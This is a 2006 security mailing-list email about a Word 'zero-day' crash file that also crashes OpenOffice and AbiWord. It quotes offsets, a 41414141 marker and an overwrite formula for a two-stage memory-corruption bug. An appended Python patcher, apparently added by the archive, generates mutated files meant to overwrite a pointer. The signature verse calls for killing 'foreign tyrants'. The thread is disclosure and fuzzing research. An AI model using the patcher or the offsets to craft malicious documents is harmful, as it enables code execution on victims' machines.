Date: Tue, 12 Dec 2006 19:44:38 +0100
From: Joxean Koret <>
To: Disco Jonny <>
Cc: Full Disclosure <>,
	Fuzzing List <>, "L. M. H" <>
Subject: Re: [fuzzing] OWASP Fuzzing page

Wow! That's fun! The so-called "Word 0 day" flaw also affects OpenOffice.org, at least 1.1.3. And, oh! AbiWord does something cool
with the file:

joxean@...eankoret $ abiword 12122006-djtest.doc

** (AbiWord-2.2:24313): WARNING **: Invalid seek

** (AbiWord-2.2:24313): WARNING **: Invalid seek

** (AbiWord-2.2:24313): WARNING **: Invalid seek

** (AbiWord-2.2:24313): WARNING **: Invalid seek
joxean@...eankoret $ ooffice 12122006-djtest.doc
lockfile found (/home/joxean/.openoffice/1.1.3/.lock)
Using existing
Application Error
sh: line 1: crash_report: command not found
Application Error

Fatal exception: Signal 6

I'm using OpenOffice.org 1.1.3 (distributed with Debian Sarge 3.1). I
will play a little with the PoC to see whether it affects OOffice in a way
that makes code execution possible.

Joxean Koret

> for something a little more technical
> This is an email I sent someone else. (Sorry mate, I'll give a few
> other ones for the 'project' :) )
> I do not know of any fuzzer that would find this.  I do not know of
> any fuzzing method, except the one I use that would find this.
> =====
> The file I have attached is a very basic two-stage bug. Stage 1 (the
> first mod) forces the code down a wrong path. The second mod by
> itself is harmless; however, when used with the first, it will be the
> first and part of the second overwrite.
> I have used 41414141 as a marker to make it easier for you to see.
> I have made it crash the Word viewer again to make it more obvious.
> Weight,
> location: 00000274
> value   : 00000022 - just so it crashes; values 00000001 -> 00000006
> are probably the most useful for trying to overwrite a pointer. Notice
> that neighbouring areas can be weighted the same.
> marker,
> location: 000027e4
> value   : 41414141
> The weight destination address == ((weight * 4 [this is EDI]) + 4
> [ECX*4]) + source memory offset [ESI].
> [Also, the metadata is Microsoft's, not mine.]
> ======
> bug hugs,
> disco.
Perhaps, perhaps, one day
the true Zuberoans will rise,
the true Basques,
to kill the foreign tyrants
and to give back to the people
the land our fathers' fathers left us.
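As an added illustration of the two-stage mutation Disco describes in the quoted mail (this is example code written for this archive page, not the attached sample and not anything the thread's authors posted): a small Python patcher that writes the "weight" dword at file offset 0x274 and the 41414141 marker at 0x27e4, produces one mutated file per weight in the 1..6 range the mail calls most useful, and evaluates the quoted destination formula ((weight * 4) + 4) + source offset. The seed is a constructed zero-filled buffer standing in for the real .doc, which is not on this page; the function names, the choice to store both values as little-endian 32-bit words, and the 0x1000 source base used in the usage line are my assumptions.

```python
import struct

# Offsets and values quoted from Disco's description of the attached sample.
WEIGHT_OFFSET = 0x274
MARKER_OFFSET = 0x27E4
MARKER = 0x41414141
CRASH_WEIGHT = 0x22           # "just so it crashes"
USEFUL_WEIGHTS = range(1, 7)  # 00000001 -> 00000006, "most useful" for a pointer overwrite


def patch_dword(data, offset, value):
    """Return a copy of `data` with `value` written at `offset` as a little-endian
    32-bit word (assumption: the fields in the sample are LE dwords)."""
    if offset < 0 or offset + 4 > len(data):
        raise ValueError("offset 0x%x is outside the %d-byte buffer" % (offset, len(data)))
    out = bytearray(data)
    out[offset:offset + 4] = struct.pack("<I", value & 0xFFFFFFFF)
    return bytes(out)


def read_dword(data, offset):
    """Little-endian 32-bit read, used to check what the patcher wrote."""
    return struct.unpack("<I", data[offset:offset + 4])[0]


def stage1(seed, weight=CRASH_WEIGHT):
    """Stage 1 alone: the weight that forces the parser down the wrong path."""
    return patch_dword(seed, WEIGHT_OFFSET, weight)


def two_stage_mutation(seed, weight=CRASH_WEIGHT, marker=MARKER):
    """Both stages: the weight first, then the marker that the wrong path
    ends up copying (harmless on its own, per the mail)."""
    return patch_dword(stage1(seed, weight), MARKER_OFFSET, marker)


def weight_destination(weight, source_offset):
    """Where the overwrite lands, per the formula quoted in the mail:
    ((weight * 4) [EDI] + 4 [ECX*4]) + source memory offset [ESI]."""
    return (weight * 4 + 4) + source_offset


def weight_sweep(seed, weights=USEFUL_WEIGHTS, marker=MARKER):
    """One mutated file per candidate weight, keyed by the weight value."""
    return {w: two_stage_mutation(seed, weight=w, marker=marker) for w in weights}


def constructed_seed(size=0x3000):
    """Constructed placeholder: a zero-filled buffer large enough to hold both
    offsets. It is NOT a Word document; substitute the real seed file."""
    return bytes(size)


if __name__ == "__main__":
    import pathlib

    seed = constructed_seed()
    crash = two_stage_mutation(seed)
    pathlib.Path("crash.doc").write_bytes(crash)
    for w, blob in weight_sweep(seed).items():
        pathlib.Path("weight-%02x.doc" % w).write_bytes(blob)
        print("weight 0x%02x -> destination 0x%08x (source base 0x1000)"
              % (w, weight_destination(w, 0x1000)))
```

Run the real seed through `two_stage_mutation` and `stage1` separately: the mail's claim is that `stage1` output alone or the marker alone does nothing, and only the combined file reaches the overwrite, so a harness that triages crashes should diff behaviour across those three variants rather than only the final file.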
